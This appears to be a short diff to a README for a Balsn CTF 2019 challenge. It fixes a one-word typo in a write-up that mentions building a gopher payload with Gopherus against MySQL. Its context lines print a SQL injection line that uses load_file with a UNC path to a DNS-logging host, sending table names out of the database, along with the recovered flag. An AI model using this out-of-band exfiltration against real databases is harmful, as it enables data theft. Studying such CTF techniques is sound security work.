w181496/My-CTF-Challenges/Balsn-CTF-2019/README.md

 For the MySQL protocol, you can use some tools like [Gopherus](https://github.com/tarunkant/Gopherus) to create the gopher payload.

-At last, you just need to use Time-based or Out-of-band (DNS log) methods to exfiltration the query result.
+At last, you just need to use Time-based or Out-of-band (DNS log) methods to exfiltrate the query result.

 - `select load_file(concat("\\\\",table_name,".e222e6f24ba81a9b414f.d.zhack.ca/a")) from information_schema.tables where table_schema="ThisIsTheDbName";`
     - Output: `fl4ggg`